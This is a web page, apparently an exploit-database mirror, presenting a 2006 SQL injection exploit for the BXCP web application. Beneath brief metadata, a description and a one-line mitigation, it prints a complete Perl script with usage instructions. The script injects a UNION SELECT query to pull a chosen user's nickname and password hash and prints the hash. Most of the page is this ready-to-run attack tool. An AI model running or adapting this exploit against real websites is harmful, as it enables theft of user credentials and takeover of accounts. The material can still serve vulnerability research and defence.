header-logo
Suggest Exploit
vendor:
BXCP
by:
x23
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BXCP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BXCP exploit

This exploit is used to gain access to the user's password hash by exploiting a SQL injection vulnerability in the BXCP web application. The exploit takes the server, directory and user ID as arguments and then sends an HTTP request to the server with the malicious SQL query. The response contains the user's password hash which can then be used to gain access to the user's account.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)\n"; }

$get = "http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;

print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~ /([0-9a-f]{32})\n/) {
     print "~ hash: $1\n";
     break;
  }
}

close($sock);

# milw0rm.com [2006-07-02]

Navigation

Suggest Exploit

Services By CQR